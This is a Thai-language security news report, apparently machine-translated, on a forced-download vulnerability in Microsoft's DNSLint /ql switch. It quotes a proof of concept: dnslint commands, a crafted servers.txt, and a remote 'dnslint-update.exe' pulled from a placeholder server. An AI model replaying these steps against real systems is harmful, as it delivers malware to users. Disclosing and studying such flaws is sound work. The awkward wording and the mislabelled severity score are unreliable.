สวิตช์ QL ยูทิลิตี้ DNSLint ของ Microsoft สามารถอนุญาตให้ดาวน์โหลดไฟล์ระยะไกลได้

ความปลอดภัย / สวิตช์ QL ยูทิลิตี้ DNSLint ของ Microsoft สามารถอนุญาตให้ดาวน์โหลดไฟล์ระยะไกลได้ อ่าน 2 นาที

บริษัท ไมโครซอฟต์



Microsoft DNSLint ยูทิลิตี้ทำงานเพื่อวินิจฉัยปัญหาการค้นหาชื่อระบบชื่อโดเมน (DNS) ที่เกี่ยวข้องกับที่อยู่ IP ที่กำหนดให้กับเว็บเซิร์ฟเวอร์อื่นที่เข้าถึงผ่านเบราว์เซอร์ ไม่รวมเป็นส่วนหนึ่งของแพ็คเกจ Windows พื้นฐาน แต่สามารถดาวน์โหลดได้จากเว็บไซต์ของ Microsoft ได้ฟรี ช่องโหว่การเข้าถึงระยะไกลให้คะแนน 7.6 (วิกฤต) ใน CVSS 3.0 พบว่าสเกลมีผลต่อยูทิลิตี้นี้ทำให้เกิดการบังคับไดรฟ์โดยการดาวน์โหลด

ช่องโหว่ดังกล่าวเกิดขึ้นจากข้อเท็จจริงที่ว่า DNSLint ไม่ตรวจสอบชื่อโดเมนเมื่อแยกวิเคราะห์ไฟล์ทดสอบ DNS ตามสวิตช์“ / ql” ในกรณีที่ผู้ใช้ปลายทางจัดการเพื่อใช้ไฟล์ที่มีสคริปต์หรือรหัสไบนารีซึ่งตรงข้ามกับข้อมูลชื่อโดเมนที่คาดการณ์ไว้โดยทั่วไประบบอาจมีความเสี่ยงที่จะทำให้เกิดการบังคับดาวน์โหลดได้ง่าย ในกรณีที่เกิดขึ้นแฮ็กเกอร์อาจผลักดันให้บังคับให้ดาวน์โหลดไฟล์ที่เป็นอันตรายซึ่งสามารถดาวน์โหลดและดำเนินการคำสั่งระยะไกลเมื่อเข้าถึงผ่านเว็บเบราว์เซอร์ การดาวน์โหลดจะบันทึกลงในตำแหน่งระบบภายในและแจ้งการเข้าถึงความปลอดภัยและเมื่อเห็นว่าไฟล์มาจากตำแหน่งที่ทราบในดิสก์ไดรฟ์ผู้ใช้อาจมีแนวโน้มที่จะอนุญาตให้ปฏิบัติการดำเนินการต่อไป เมื่อไฟล์ที่เป็นอันตรายได้รับสิทธิ์แล้วไฟล์อาจเรียกใช้โค้ดที่ต้องการจากระยะไกลและทำให้ความปลอดภัยและความเป็นส่วนตัวของผู้ใช้ลดลง



หน้าจอห์นจาก hyp3rlinx ได้เขียนข้อพิสูจน์ของแนวคิดที่จำลองช่องโหว่นี้โดยอธิบายว่าไฟล์ที่ไม่ได้ตั้งใจสามารถดาวน์โหลดได้ดังต่อไปนี้เมื่อสคริปต์หรือไฟล์ข้อความอ้างอิงไบนารีถูกใช้ตรงข้ามกับชื่อโดเมน:



dnslint.exe / v / y / d“ MALWARE-FILE” / s X.X.X.X / r“ myreport”



ในบริบทของยูทิลิตี้ DNSLint สิ่งต่อไปนี้จะแสดงให้เห็นว่าช่องโหว่นี้สามารถถูกใช้เพื่อนำมัลแวร์เข้าสู่ระบบได้อย่างไร

1)“ dnslint-update.exe” บนเว็บเซิร์ฟเวอร์ระยะไกล root dir
2)“ servers.txt”
DNSLint
; นี่คือไฟล์อินพุต DNSLint ตัวอย่าง
+ เซิร์ฟเวอร์ DNS นี้เรียกว่า: dns1.cp.msft.net
[เซิร์ฟเวอร์ DNS ~] X.X.X.X
, a, r; บันทึก
X.X.X.X, ptr, r; บันทึก PTR
test1, cname, r; ระเบียน CNAME
test2, mx, r; ระเบียน MX
3) dnslint.exe / ql servers.txt

รหัสด้านบนไม่ได้รับการแก้ไขตามที่ระบุไว้ในไฟล์ สิทธิ ของ hyp3rlinx ในเนื้อหานี้ การเปิดเผยช่องโหว่นี้ดูเหมือนว่ายังไม่มีการอัปเดตแพตช์ใด ๆ เพื่อแก้ไขปัญหานี้ ณ ตอนนี้ รหัส CVE ยังคงถูกกำหนดให้กับช่องโหว่นี้และจะต้องได้รับการระบุและเขียนโดย Microsoft ในกระดานข่าวความปลอดภัยอย่างเป็นทางการในเรื่องนี้